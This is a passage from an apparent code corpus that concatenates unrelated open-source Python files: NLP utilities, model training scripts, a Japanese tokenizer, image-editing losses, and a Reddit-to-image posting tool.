W2 = np.random.randn(H, O)
b2 = np.random.randn(O)
self.layers = [
Affine(W1, b1),
Sigmoid(),
Affine(W2, b2)
]
self.params = []
for layer in self.layers:
self.params += layer.params
def predict(self, x):
for layer in self.layers:
x = layer.forward(x)
return x
def main():
x = np.random.randn(10, 2)
model = TwoLayerNet(2, 4, 3)
s = model.predict(x)
print('out:', s)
if __name__ == '__main__':
main()
``` |
{
"source": "jojonki/double_array",
"score": 3
} |
#### File: double_array/utils/gen_vocabs_from_ipa_wiki.py
```python
import argparse
import codecs
import glob
import gzip
import os
import time
from tqdm import tqdm
def main():
begin_time = time.time()
parser = argparse.ArgumentParser()
parser.add_argument('--ipadic_dir', type=str, metavar='PATH', default='./utils/mecab-ipadic-2.7.0-20070801', help='mecab ipadic dir')
parser.add_argument('--wiki', type=str, metavar='PATH',
default='./data/jawiki-latest-all-titles-in-ns0.gz',
help='wikipedia all titles file')
parser.add_argument('--out', type=str, metavar='PATH', default='./utils/ipa-wiki-vocab.txt', help='output filename')
args = parser.parse_args()
# get all the csv files in that directory (assuming they have the extension .csv)
print('Loading ipadic:', args.ipadic_dir)
csv_files = glob.glob(os.path.join(args.ipadic_dir, '*.csv'))
with open(args.out, 'w') as fout:
for c in csv_files:
print('Load', c)
with codecs.open(c, 'r', 'euc_jp') as fin:
for l in fin:
fout.write('{}\n'.format(l.split(',')[0]))
print('Loading wiki data:', args.wiki)
with gzip.open(args.wiki, 'r') as fin:
        with open(args.out, 'a', encoding='utf-8') as fout:  # append, so the ipadic entries written above are kept
lines = fin
for ln in tqdm(lines):
w = ln.decode('utf-8').strip()
if len(w) >= 2:
print(w, file=fout)
print('Output:', args.out)
print('Process time: {:.1f}s'.format(time.time() - begin_time))
if __name__ == '__main__':
main()
``` |
{
"source": "jojonki/Hybrid-Code-Networks",
"score": 2
} |
#### File: jojonki/Hybrid-Code-Networks/utils.py
```python
import re
import copy
import pickle
import numpy as np
from collections import OrderedDict
import torch
from torch.autograd import Variable
import global_variables as g
def save_checkpoint(state, filename='./checkpoints/checkpoint.pth.tar'):
print('save model!', filename)
torch.save(state, filename)
def save_pickle(d, path):
print('save pickle to', path)
with open(path, mode='wb') as f:
pickle.dump(d, f)
def load_pickle(path):
print('load', path)
with open(path, mode='rb') as f:
return pickle.load(f)
def get_entities(fpath):
entities = OrderedDict({'R_cuisine': [], 'R_location': [], 'R_price': [], 'R_number': []})
with open(fpath, 'r') as file:
lines = file.readlines()
for l in lines:
wds = l.rstrip().split(' ')[2].split('\t')
slot_type = wds[0] # ex) R_price
slot_val = wds[1] # ex) cheap
# if slot_type not in entities:
# entities[slot_type] = []
if slot_type in entities:
if slot_val not in entities[slot_type]:
entities[slot_type].append(slot_val)
return entities
def load_embd_weights(word2vec, vocab_size, embd_size, w2i):
embedding_matrix = np.zeros((vocab_size, embd_size))
print('embed_matrix.shape', embedding_matrix.shape)
found_ct = 0
for word, idx in w2i.items():
# words not found in embedding index will be all-zeros.
if word in word2vec.wv:
embedding_matrix[idx] = word2vec.wv[word]
found_ct += 1
print(found_ct, 'words are found in word2vec. vocab_size is', vocab_size)
return torch.from_numpy(embedding_matrix).type(torch.FloatTensor)
def preload(fpath, vocab, system_acts):
with open(fpath, 'r') as f:
lines = f.readlines()
for idx, l in enumerate(lines):
l = l.rstrip()
if l != '':
ls = l.split("\t")
t_u = ls[0].split(' ', 1)
# turn = t_u[0]
uttr = t_u[1].split(' ')
if len(ls) == 2: # includes user and system utterance
for w in uttr:
if w not in vocab:
vocab.append(w)
if len(ls) == 2: # includes user and system utterance
sys_act = ls[1]
sys_act = re.sub(r'resto_\S+', '', sys_act)
if sys_act.startswith('api_call'): sys_act = 'api_call'
if sys_act not in system_acts: system_acts.append(sys_act)
vocab = sorted(vocab)
system_acts = sorted(system_acts)
return vocab, system_acts
def load_data(fpath, entities, w2i, system_acts):
'''
store data as dialog (multi turns)
'''
data = []
with open(fpath, 'r') as f:
lines = f.readlines()
# x: user uttr, y: sys act, c: context, b: BoW, p: previous sys act, f: action filter
x, y, c, b, p, f = [], [], [], [], [], []
context = [0] * len(entities.keys())
for idx, l in enumerate(lines):
l = l.rstrip()
if l == '':
data.append((x, y, c, b, p, f))
# reset
x, y, c, b, p, f = [], [], [], [], [], []
context = [0] * len(entities.keys())
else:
ls = l.split("\t")
t_u = ls[0].split(' ', 1)
# turn = t_u[0]
uttr = t_u[1].split(' ')
update_context(context, uttr, entities)
act_filter = generate_act_filter(len(system_acts), context)
bow = get_bow(uttr, w2i)
sys_act = g.SILENT
if len(ls) == 2: # includes user and system utterance
sys_act = ls[1]
sys_act = re.sub(r'resto_\S+', '', sys_act)
if sys_act.startswith('api_call'): sys_act = 'api_call'
else:
continue # TODO
x.append(uttr)
if len(y) == 0:
p.append(g.SILENT)
else:
p.append(y[-1])
y.append(sys_act)
c.append(copy.deepcopy(context))
b.append(bow)
f.append(act_filter)
return data, system_acts
def update_context(context, sentence, entities):
for idx, (ent_key, ent_vals) in enumerate(entities.items()):
for w in sentence:
if w in ent_vals:
context[idx] = 1
def generate_act_filter(action_size, context):
mask = [0] * action_size
# TODO hard coding
# 0 <SILENT>
# 1 any preference on a type of cuisine
# 2 api_call
# 3 great let me do the reservation
# 4 hello what can i help you with today
# 5 here it is
# 6 how many people would be in your party
# 7 i'm on it
# 8 is there anything i can help you with
# 9 ok let me look into some options for you
# 10 sure is there anything else to update
# 11 sure let me find an other option for you
# 12 what do you think of this option:
# 13 where should it be
# 14 which price range are looking for
# 15 you're welcome
# context: {'R_cuisine': [], 'R_location': [], 'R_price': [], 'R_number': []}
mask[0] = 1
mask[7] = 1
mask[8] = 1
if context == [0, 0, 0, 0]:
mask[4] = 1
if context == [1, 1, 1, 1]:
mask[2] = 1
mask[3] = 1
mask[5] = 1
mask[8] = 1
mask[9] = 1
mask[10] = 1
mask[11] = 1
mask[12] = 1
mask[15] = 1
if context[0] == 0: # R_cuisine
mask[1] = 1
if context[1] == 0: # R_location
mask[13] = 1
if context[2] == 0: # R_price
mask[14] = 1
if context[3] == 0: # R_number
mask[6] = 1
return mask
def get_bow(sentence, w2i):
bow = [0] * len(w2i)
for word in sentence:
if word in w2i:
bow[w2i[word]] += 1
return bow
def add_padding(data, seq_len):
pad_len = max(0, seq_len - len(data))
data += [0] * pad_len
data = data[:seq_len]
return data
def make_word_vector(uttrs_list, w2i, dialog_maxlen, uttr_maxlen):
dialog_list = []
for uttrs in uttrs_list:
dialog = []
for sentence in uttrs:
sent_vec = [w2i[w] if w in w2i else w2i[g.UNK] for w in sentence]
sent_vec = add_padding(sent_vec, uttr_maxlen)
dialog.append(sent_vec)
for _ in range(dialog_maxlen - len(dialog)):
dialog.append([0] * uttr_maxlen)
dialog = torch.LongTensor(dialog[:dialog_maxlen])
dialog_list.append(dialog)
return to_var(torch.stack(dialog_list, 0))
def to_var(x):
if torch.cuda.is_available():
x = x.cuda()
return Variable(x)
def padding(data, default_val, maxlen, pad_seq_len):
for i, d in enumerate(data):
pad_len = maxlen - len(d)
for _ in range(pad_len):
data[i].append([default_val] * pad_seq_len)
return to_var(torch.FloatTensor(data))
def get_data_from_batch(batch, w2i, act2i):
uttrs_list = [d[0] for d in batch]
dialog_maxlen = max([len(uttrs) for uttrs in uttrs_list])
uttr_maxlen = max([len(u) for uttrs in uttrs_list for u in uttrs])
uttr_var = make_word_vector(uttrs_list, w2i, dialog_maxlen, uttr_maxlen)
batch_labels = [d[1] for d in batch]
labels_var = []
for labels in batch_labels:
vec_labels = [act2i[l] for l in labels]
pad_len = dialog_maxlen - len(labels)
for _ in range(pad_len):
vec_labels.append(act2i[g.SILENT])
labels_var.append(torch.LongTensor(vec_labels))
labels_var = to_var(torch.stack(labels_var, 0))
batch_prev_acts = [d[4] for d in batch]
prev_var = []
for prev_acts in batch_prev_acts:
vec_prev_acts = []
for act in prev_acts:
tmp = [0] * len(act2i)
tmp[act2i[act]] = 1
vec_prev_acts.append(tmp)
pad_len = dialog_maxlen - len(prev_acts)
for _ in range(pad_len):
vec_prev_acts.append([0] * len(act2i))
prev_var.append(torch.FloatTensor(vec_prev_acts))
prev_var = to_var(torch.stack(prev_var, 0))
context = copy.deepcopy([d[2] for d in batch])
context = padding(context, 1, dialog_maxlen, len(context[0][0]))
bow = copy.deepcopy([d[3] for d in batch])
bow = padding(bow, 0, dialog_maxlen, len(bow[0][0]))
act_filter = copy.deepcopy([d[5] for d in batch])
act_filter = padding(act_filter, 0, dialog_maxlen, len(act_filter[0][0]))
return uttr_var, labels_var, context, bow, prev_var, act_filter
``` |
{
"source": "jojonki/levenshtein-distance",
"score": 3
} |
#### File: jojonki/levenshtein-distance/main.py
```python
import argparse
from leven_shtein import LevenShtein as LS
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', type=int, default=0, help='print log')
parser.add_argument('--normalize', type=int, default=1, help='normalize levenshtein distance')
parser.add_argument('--mode', type=str, default='char', help='tokenization mode. char or word. word mode is only for Japanese')
parser.add_argument('--strA', type=str, help='string A')
parser.add_argument('--strB', type=str, help='string B')
args = parser.parse_args()
if args.mode == 'word':
from janome.tokenizer import Tokenizer
def main():
strA = '今日は良い天気だよね'
strB = '今日は曇ってるよね'
if args.strA:
strA = args.strA
if args.strB:
strB = args.strB
if args.mode == 'word':
t = Tokenizer()
strA = [token.surface for token in t.tokenize(strA)]
strB = [token.surface for token in t.tokenize(strB)]
v = True if args.verbose == 1 else False
n = True if args.normalize == 1 else False
ed = LS.edit_distance(strA, strB, normalize=n, verbose=v)
print('Edit distance:', ed)
if __name__ == '__main__':
main()
``` |
{
"source": "jojonki/ngram",
"score": 3
} |
#### File: jojonki/ngram/test.py
```python
from ngram import Ngram
def test():
ng = Ngram()
# Your n-gram model is trained with a text file
ng.train('data/wiki-en-train.word')
# You can save your trained model as text. Currently, we do not support loading trained model.
ng.dump('trained_model')
# You can evaluate your trained model with test file
ng.test('data/wiki-en-test.word')
# After your evaluation, you can retrieve the below results.
print('log-likelihood\t={}'.format(ng.log_likelihood))
print('entropy\t={}'.format(ng.entropy))
print('perplexity\t={}'.format(ng.perplexity))
print('coverage\t={}'.format(ng.coverage))
if __name__ == '__main__':
test()
``` |
{
"source": "jojonki/QA-LSTM",
"score": 3
} |
#### File: jojonki/QA-LSTM/train.py
```python
import os
import random
import argparse
from tqdm import tqdm
import numpy as np
import torch
from gensim.models.keyedvectors import KeyedVectors
from utils import load_data, load_data2, load_vocabulary, Config, load_embd_weights
from utils import make_vector
from models import QA_LSTM
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=128, help='input batch size')
parser.add_argument('--start_epoch', type=int, default=0, help='resume epoch count, default=0')
parser.add_argument('--n_epochs', type=int, default=4, help='number of training epochs')
parser.add_argument('--embd_size', type=int, default=300, help='word embedding size')
parser.add_argument('--hidden_size', type=int, default=141, help='hidden size of one-directional LSTM')
parser.add_argument('--max_sent_len', type=int, default=200, help='max sentence length')
parser.add_argument('--margin', type=float, default=0.2, help='margin for loss function')
parser.add_argument('--use_pickle', type=int, default=0, help='load dataset from pickles')
parser.add_argument('--test', type=int, default=0, help='1 for test, 0 for training')
parser.add_argument('--seed', type=int, default=1111, help='random seed')
parser.add_argument('--resume', default='./checkpoints/model_best.tar', type=str, metavar='PATH', help='path saved params')
args = parser.parse_args()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
PAD = '<PAD>'
id_to_word, label_to_ans, label_to_ans_text = load_vocabulary('./V2/vocabulary', './V2/InsuranceQA.label2answer.token.encoded')
w2i = {w: i for i, w in enumerate(id_to_word.values(), 1)}
w2i[PAD] = 0
vocab_size = len(w2i)
print('vocab_size:', vocab_size)
train_data = load_data('./V2/InsuranceQA.question.anslabel.token.500.pool.solr.train.encoded', id_to_word, label_to_ans_text)
test_data = load_data2('./V2/InsuranceQA.question.anslabel.token.500.pool.solr.test.encoded', id_to_word, label_to_ans_text)
print('n_train:', len(train_data))
print('n_test:', len(test_data))
args.vocab_size = vocab_size
args.pre_embd = None
print('loading a word2vec binary...')
model_path = './GoogleNews-vectors-negative300.bin'
word2vec = KeyedVectors.load_word2vec_format(model_path, binary=True)
print('loaded!')
pre_embd = load_embd_weights(word2vec, vocab_size, args.embd_size, w2i)
# save_pickle(pre_embd, 'pre_embd.pickle')
args.pre_embd = pre_embd
def save_checkpoint(state, filename):
print('save model!', filename)
torch.save(state, filename)
def loss_fn(pos_sim, neg_sim):
loss = args.margin - pos_sim + neg_sim
if loss.data[0] < 0:
loss.data[0] = 0
return loss
def train(model, data, test_data, optimizer, n_epochs=4, batch_size=256):
for epoch in range(n_epochs):
model.train()
print('epoch', epoch)
        random.shuffle(data)  # TODO use indices
losses = []
for i, d in enumerate(tqdm(data)):
q, pos, negs = d[0], d[1], d[2]
vec_q = make_vector([q], w2i, len(q))
vec_pos = make_vector([pos], w2i, len(pos))
pos_sim = model(vec_q, vec_pos)
for _ in range(50):
neg = random.choice(negs)
vec_neg = make_vector([neg], w2i, len(neg))
neg_sim = model(vec_q, vec_neg)
loss = loss_fn(pos_sim, neg_sim)
if loss.data[0] != 0:
losses.append(loss)
break
if len(losses) == batch_size or i == len(data) - 1:
loss = torch.mean(torch.stack(losses, 0).squeeze(), 0)
print(loss.data[0])
optimizer.zero_grad()
loss.backward()
optimizer.step()
losses = []
filename = '{}/Epoch-{}.model'.format('./checkpoints', epoch)
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optimizer' : optimizer.state_dict(),
}, filename=filename)
test(model, test_data)
def test(model, data):
acc, total = 0, 0
for d in data:
q = d[0]
print('q', ' '.join(q))
labels = d[1]
cands = d[2]
# preprare answer labels
label_indices = [cands.index(l) for l in labels if l in cands]
# build data
q = make_vector([q], w2i, len(q))
cands = [label_to_ans_text[c] for c in cands] # id to text
max_cand_len = min(args.max_sent_len, max([len(c) for c in cands]))
cands = make_vector(cands, w2i, max_cand_len)
# predict
scores = [model(q, c.unsqueeze(0)).data[0] for c in cands]
pred_idx = np.argmax(scores)
if pred_idx in label_indices:
print('correct')
acc += 1
else:
print('wrong')
total += 1
print('Test Acc:', 100*acc/total, '%')
model = QA_LSTM(args)
if torch.cuda.is_available():
model.cuda()
# optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr=0.01)
optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()))
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
# best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer']) # TODO ?
print("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
train(model, train_data, test_data, optimizer)
# test(model, test_data)
``` |
{
"source": "jojonki/Taiyaki",
"score": 3
} |
#### File: Taiyaki/examples/create_lattice.py
```python
import argparse
import os
import sys
import time
parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(parent_dir)
from double_array import DoubleArray
from lattice import Lattice
def main():
# begin_time = time.time()
parser = argparse.ArgumentParser()
parser.add_argument('--dict', type=str, default='./models/ipadic-vocab.txt.dict', metavar='PATH', help='double-array dictionary')
parser.add_argument('-q', '--query', type=str, help='query')
args = parser.parse_args()
da = DoubleArray()
print('Loading dic...')
da.load(args.dict)
print('Loaded!')
query = args.query
lattice = Lattice(query)
for idx in range(len(query)):
cps_q = query[idx:]
print('=====Search {}======'.format(cps_q))
cp_list = da.commonPrefixSearch(cps_q)
print('commonPrefixSearch("{}"): {}'.format(cps_q, cp_list))
for cp in cp_list:
lattice.insert(idx, idx + len(cp), cp)
# print('Process time: {:.1f}s'.format(time.time() - begin_time))
lattice.pprint()
lattice.plot()
if __name__ == '__main__':
main()
```
#### File: Taiyaki/examples/run_tokenizer.py
```python
import argparse
import copy
import os
import sys
import time
parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(parent_dir)
from taiyaki.taiyaki import Taiyaki
def run(taiyaki, query):
cp_list = taiyaki.commonPrefixSearch(query)
print('Common prefixes: {}'.format(cp_list))
tokens = taiyaki.tokenize(query)
print('Tokenized tokens (min cost):')
print('{}\t{}\t{}\t{}'.format('表層系', '品詞', '発音', '未知語'))
for t in tokens:
print('{}\t{}\t{}\t{}'.format(t['surface'], t['pos'], t['pron'], t['unk']))
tokens = taiyaki.longestSearch(query)
print('Tokenized tokens (longest match):', tokens)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--da_dic_file',
type=str,
default='./data/da.dict',
metavar='PATH',
help='double-array dictionary')
parser.add_argument('--vocab_dic_file',
type=str,
metavar='PATH',
default='./data/vocab.dict',
help='vocabulary dictionary')
parser.add_argument('--trans_cost_file',
type=str,
metavar='PATH',
default='./data/trans_cost.dict',
help='token transition cost dictionary')
parser.add_argument('--char_cat_def_file',
type=str,
metavar='PATH',
default='./data/char_cat_def.dict',
help='char.def dictionary for unk words')
parser.add_argument('-q', '--query',
type=str,
help='input query')
args = parser.parse_args()
taiyaki = Taiyaki(args.da_dic_file, args.vocab_dic_file, args.trans_cost_file, args.char_cat_def_file)
query = args.query
if query:
print('Input:', query)
run(taiyaki, query)
else:
while True:
            query = input('Query (press "end" to exit)>> ')
if query == 'end':
break
run(taiyaki, query)
if __name__ == '__main__':
main()
```
#### File: Taiyaki/test/4-6_build_double_array.py
```python
from collections import OrderedDict
base = [0] * 10
check = [0] * 10
code = {'#': 0, 'a': 1, 'b': 2, 'c': 3, 'd': 4}
def build_double_array(dic):
s = 1
base[1] = s
crnt_pref = ''
pref_list = []
for k in dic.keys():
if k[0] not in pref_list:
pref_list.append(k[0])
ptr = s + 1
for c in pref_list:
print(c)
check[ptr] = s
        # leaf-node check
pref = crnt_pref + c
pref_count = 0
for d in dic.keys():
if d.startswith(pref):
pref_count += 1
                if pref_count > 1:  # two or more entries start with this prefix, so it is not a leaf node
break
if pref_count == 1:
base[ptr] = -dic[pref]
ptr += 1
s = s + 1
for c in pref_list:
sub_pref_list = [d for d in dic.keys() if d.startswith(c)]
for sub in sub_pref_list:
print(sub_pref_list)
print('base ', base)
print('check', check)
dic = OrderedDict({'a': 1, 'ac': 2, 'b': 3, 'cab': 4, 'cd': 5})
build_double_array(dic)
``` |
{
"source": "jojoon99/Barbershop",
"score": 2
} |
#### File: Barbershop/losses/align_loss.py
```python
import torch
from losses.style.style_loss import StyleLoss
class AlignLossBuilder(torch.nn.Module):
def __init__(self, opt):
super(AlignLossBuilder, self).__init__()
self.opt = opt
self.parsed_loss = [[opt.l2_lambda, 'l2'], [opt.percept_lambda, 'percep']]
if opt.device == 'cuda':
use_gpu = True
else:
use_gpu = False
self.cross_entropy = torch.nn.CrossEntropyLoss()
self.style = StyleLoss(distance="l2", VGG16_ACTIVATIONS_LIST=[3, 8, 15, 22], normalize=False).to(opt.device)
self.style.eval()
tmp = torch.zeros(16).to(opt.device)
tmp[0] = 1
self.cross_entropy_wo_background = torch.nn.CrossEntropyLoss(weight=1 - tmp)
self.cross_entropy_only_background = torch.nn.CrossEntropyLoss(weight=tmp)
def cross_entropy_loss(self, down_seg, target_mask):
loss = self.opt.ce_lambda * self.cross_entropy(down_seg, target_mask)
return loss
def style_loss(self, im1, im2, mask1, mask2):
loss = self.opt.style_lambda * self.style(im1 * mask1, im2 * mask2, mask1=mask1, mask2=mask2)
return loss
def cross_entropy_loss_wo_background(self, down_seg, target_mask):
loss = self.opt.ce_lambda * self.cross_entropy_wo_background(down_seg, target_mask)
return loss
def cross_entropy_loss_only_background(self, down_seg, target_mask):
loss = self.opt.ce_lambda * self.cross_entropy_only_background(down_seg, target_mask)
return loss
```
#### File: losses/style/custom_loss.py
```python
import torch
import torch.nn as nn
from torch.nn import functional as F
mse_loss = nn.MSELoss(reduction="mean")
def custom_loss(x, y, mask=None, loss_type="l2", include_bkgd=True):
"""
x, y: [N, C, H, W]
Computes L1/L2 loss
if include_bkgd is True:
use traditional MSE and L1 loss
else:
mask out background info using :mask
normalize loss with #1's in mask
"""
if include_bkgd:
# perform simple mse or l1 loss
if loss_type == "l2":
loss_rec = mse_loss(x, y)
elif loss_type == "l1":
loss_rec = F.l1_loss(x, y)
return loss_rec
Nx, Cx, Hx, Wx = x.shape
Nm, Cm, Hm, Wm = mask.shape
mask = prepare_mask(x, mask)
x_reshape = torch.reshape(x, [Nx, -1])
y_reshape = torch.reshape(y, [Nx, -1])
mask_reshape = torch.reshape(mask, [Nx, -1])
if loss_type == "l2":
diff = (x_reshape - y_reshape) ** 2
elif loss_type == "l1":
diff = torch.abs(x_reshape - y_reshape)
# diff: [N, Cx * Hx * Wx]
# set elements in diff to 0 using mask
masked_diff = diff * mask_reshape
sum_diff = torch.sum(masked_diff, axis=-1)
# count non-zero elements; add :mask_reshape elements
norm_count = torch.sum(mask_reshape, axis=-1)
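    # the +1.0 in the denominator below guards against masks that select no pixels (norm_count == 0)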
diff_norm = sum_diff / (norm_count + 1.0)
loss_rec = torch.mean(diff_norm)
return loss_rec
def prepare_mask(x, mask):
"""
Make mask similar to x.
Mask contains values in [0, 1].
Adjust channels and spatial dimensions.
"""
Nx, Cx, Hx, Wx = x.shape
Nm, Cm, Hm, Wm = mask.shape
if Cm == 1:
mask = mask.repeat(1, Cx, 1, 1)
mask = F.interpolate(mask, scale_factor=Hx / Hm, mode="nearest")
return mask
```
#### File: Barbershop/utils/drive.py
```python
import requests
import html
import hashlib
import glob
import os
import io
from typing import Any
import re
import uuid
def is_url(obj: Any) -> bool:
"""Determine whether the given object is a valid URL string."""
if not isinstance(obj, str) or not "://" in obj:
return False
try:
res = requests.compat.urlparse(obj)
if not res.scheme or not res.netloc or not "." in res.netloc:
return False
res = requests.compat.urlparse(requests.compat.urljoin(obj, "/"))
if not res.scheme or not res.netloc or not "." in res.netloc:
return False
except:
return False
return True
def open_url(url: str, cache_dir: str = None, num_attempts: int = 10, verbose: bool = True, return_path: bool = False) -> Any:
"""Download the given URL and return a binary-mode file object to access the data."""
assert is_url(url)
assert num_attempts >= 1
# Lookup from cache.
url_md5 = hashlib.md5(url.encode("utf-8")).hexdigest()
if cache_dir is not None:
cache_files = glob.glob(os.path.join(cache_dir, url_md5 + "_*"))
if len(cache_files) == 1:
if(return_path):
return cache_files[0]
else:
return open(cache_files[0], "rb")
# Download.
url_name = None
url_data = None
with requests.Session() as session:
if verbose:
print("Downloading %s ..." % url, end="", flush=True)
for attempts_left in reversed(range(num_attempts)):
try:
with session.get(url) as res:
res.raise_for_status()
if len(res.content) == 0:
raise IOError("No data received")
if len(res.content) < 8192:
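                        # small responses are usually Google Drive interstitial pages
                        # (virus-scan nag / quota error) rather than the requested file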
content_str = res.content.decode("utf-8")
if "download_warning" in res.headers.get("Set-Cookie", ""):
links = [html.unescape(link) for link in content_str.split('"') if "export=download" in link]
if len(links) == 1:
url = requests.compat.urljoin(url, links[0])
raise IOError("Google Drive virus checker nag")
if "Google Drive - Quota exceeded" in content_str:
raise IOError("Google Drive quota exceeded")
match = re.search(r'filename="([^"]*)"', res.headers.get("Content-Disposition", ""))
url_name = match[1] if match else url
url_data = res.content
if verbose:
print(" done")
break
except:
if not attempts_left:
if verbose:
print(" failed")
raise
if verbose:
print(".", end="", flush=True)
# Save to cache.
if cache_dir is not None:
safe_name = re.sub(r"[^0-9a-zA-Z-._]", "_", url_name)
cache_file = os.path.join(cache_dir, url_md5 + "_" + safe_name)
temp_file = os.path.join(cache_dir, "tmp_" + uuid.uuid4().hex + "_" + url_md5 + "_" + safe_name)
os.makedirs(cache_dir, exist_ok=True)
with open(temp_file, "wb") as f:
f.write(url_data)
os.replace(temp_file, cache_file) # atomic
if(return_path): return cache_file
# Return data as file object.
return io.BytesIO(url_data)
``` |
{
"source": "JoJoPuppe/reddit-to-imgurImage",
"score": 3
} |
#### File: reddit-to-imgurImage/reddit_to_imgurImage/image_post.py
```python
from PIL import ImageDraw, ImageFont
from reddit_to_imgurImage.textfitter import CenterdTextImage
from reddit_to_imgurImage.gradient import Gradient
from datetime import datetime
class Post(object):
def __init__(self, size, font_path):
self.size = size
self.post_size = (size, size)
self.image = None
self.font_path = font_path
def create_text_image(self, text):
text_box_size = (self.size - 100, self.size - 100)
image = CenterdTextImage(self.post_size, text_box_size, self.font_path)
image.load_text(text)
image = image.write_text_lines()
return image
def combine_gradient_and_text(self, text):
gradient = Gradient(self.size)
gradient_img = gradient.random_gradient()
text_box = self.create_text_image(text)
text_image = ImageDraw.Draw(text_box)
text_image.rectangle([(25, 25), (self.size - 25, self.size - 25)],
outline=(255, 255, 255), width=3)
gradient_img.paste(text_box, (0, 0, self.size, self.size), text_box)
self.image = gradient_img
def add_source(self, source_string):
font = ImageFont.truetype(self.font_path, 15)
draw = ImageDraw.Draw(self.image)
position = (40, self.size - 50)
draw.text(position, source_string,
fill=(255, 255, 255, 255), font=font)
def save(self, file_path):
if self.image is None:
print("No image generated")
return None
self.image.save(file_path, "JPEG")
def show(self):
if self.image is None:
print("No image generated")
return None
self.image.show()
```
#### File: reddit-to-imgurImage/reddit_to_imgurImage/reddit_subs_db.py
```python
import mysql.connector
class MysqlSubmissions(object):
def __init__(self):
self.db = None
def connect(self, host, database, user, password):
self.db = mysql.connector.connect(
host=host,
database=database,
user=user,
password=password
)
def create_table(self, table_name):
db_cursor = self.db.cursor()
create_table_query = f" \
CREATE TABLE IF NOT EXISTS {table_name} \
( sub_id VARCHAR(120) UNIQUE NOT NULL,\
sub_creation_time DATETIME NOT NULL,\
is_posted BOOL DEFAULT 0,\
PRIMARY KEY (sub_id)\
);"
db_cursor.execute(create_table_query)
db_cursor.close()
def insert(self, data):
db_cursor = self.db.cursor()
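        # NOTE: the queries below hardcode the life_pro_tips table even though
        # create_table() accepts an arbitrary table name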
insert_query = "INSERT IGNORE INTO life_pro_tips (sub_id, sub_creation_time) \
VALUES (%s, %s)"
db_cursor.executemany(insert_query, data)
self.db.commit()
db_cursor.close()
def get_new_post(self):
db_cursor = self.db.cursor()
select_query = "SELECT sub_id, sub_creation_time, is_posted FROM life_pro_tips \
INNER JOIN(SELECT is_posted AS isposted, MIN(sub_creation_time) \
AS maxtime FROM life_pro_tips WHERE is_posted = 0) mingroup \
ON life_pro_tips.sub_creation_time = mingroup.maxtime"
db_cursor.execute(select_query)
results = db_cursor.fetchall()
db_cursor.close()
return results
def get_pending_posts(self):
db_cursor = self.db.cursor()
select_query = "SELECT sub_id FROM life_pro_tips WHERE is_posted = 0"
db_cursor.execute(select_query)
results = db_cursor.fetchall()
db_cursor.close()
return results
    def set_posted(self, sub_id, is_posted=1):
        db_cursor = self.db.cursor()
        # parameterized query: escapes sub_id and honors the is_posted argument
        update_query = "UPDATE life_pro_tips SET is_posted = %s WHERE sub_id = %s"
        db_cursor.execute(update_query, (is_posted, sub_id))
        self.db.commit()
        db_cursor.close()
def close(self):
self.db.close()
```
#### File: reddit-to-imgurImage/reddit_to_imgurImage/reddit_top_subs.py
```python
import praw
import time
class RedditSubmissions(object):
def __init__(self, min_score=100):
self.reddit = None
self.min_score = min_score
def authenticate(self, client_id, client_secret, password, user_agent, username):
reddit = praw.Reddit(client_id=client_id,
client_secret=client_secret,
password=password,
user_agent=user_agent,
username=username)
self.reddit = reddit
def get_top_subs(self, sub_name):
subs = []
for submission in self.reddit.subreddit(sub_name).hot(limit=10):
if submission.score < self.min_score: continue
            formatted_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(submission.created_utc))
subs.append((submission.id, formatted_date))
return subs
def sub_title(self, sub_id):
oldest_sub = praw.models.Submission(self.reddit, id=sub_id)
return oldest_sub.title
```
#### File: reddit-to-imgurImage/reddit_to_imgurImage/textfitter.py
```python
from PIL import Image, ImageDraw, ImageFont
class CenterdTextImage(object):
def __init__(self, size, text_box_size, font_filename,
mode='RGBA', background=(0, 0, 0, 0)):
self.height = size[1]
self.width = size[0]
self.text = None
self.text_box_height = text_box_size[1]
self.text_box_width = text_box_size[0]
self.image = Image.new(mode, (self.width, self.height),
color=background)
self.draw = ImageDraw.Draw(self.image)
self.x = int((self.width - self.text_box_width) / 2)
self.y = int((self.height - self.text_box_height) / 2)
self.font_filename = font_filename
def load_text(self, text):
self.text = text
def write_text(self, pos, text, font_size=11,
color=(255, 255, 255)):
font = ImageFont.truetype(self.font_filename, font_size)
self.draw.text(pos, text, font=font, fill=color)
def get_text_size(self, font_size, text):
font = ImageFont.truetype(self.font_filename, font_size)
return font.getsize(text)
def build_lines(self, font_size):
words = self.text.split()
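        # greedy word wrap: keep appending words to the current line while the
        # rendered width still fits inside the text box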
lines = []
line = []
for word in words:
new_line = ' '.join(line + [word])
size = self.get_text_size(font_size, new_line)
if size[0] <= self.text_box_width:
line.append(word)
else:
lines.append(line)
line = [word]
if line:
lines.append(line)
return lines
def get_max_text_size(self, lines, font_size):
size_array = []
for line in lines:
line = ' '.join(line)
size = self.get_text_size(font_size, line)
size_array.append(size)
return max(size_array, key=lambda x: x[0])
def get_optimal_font_size(self):
lines = []
font_size = 0
height_sum = 0
size = [0, 0]
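        # grow the font size until the wrapped text overflows the box height, then step back one size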
while height_sum < self.text_box_height:
font_size += 1
lines = self.build_lines(font_size)
size = self.get_max_text_size(lines, font_size)
text_height = size[1]
height_sum = len(lines) * text_height
font_size -= 1
return font_size
def check_max_width(self, font_size):
lines = self.build_lines(font_size)
size = self.get_max_text_size(lines, font_size)
while size[0] > self.text_box_width:
font_size -= 1
lines = self.build_lines(font_size)
size = self.get_max_text_size(lines, font_size)
font_size += 1
return font_size
def write_text_lines(self, color=(255, 255, 255)):
font_size = self.get_optimal_font_size()
font_size = self.check_max_width(font_size)
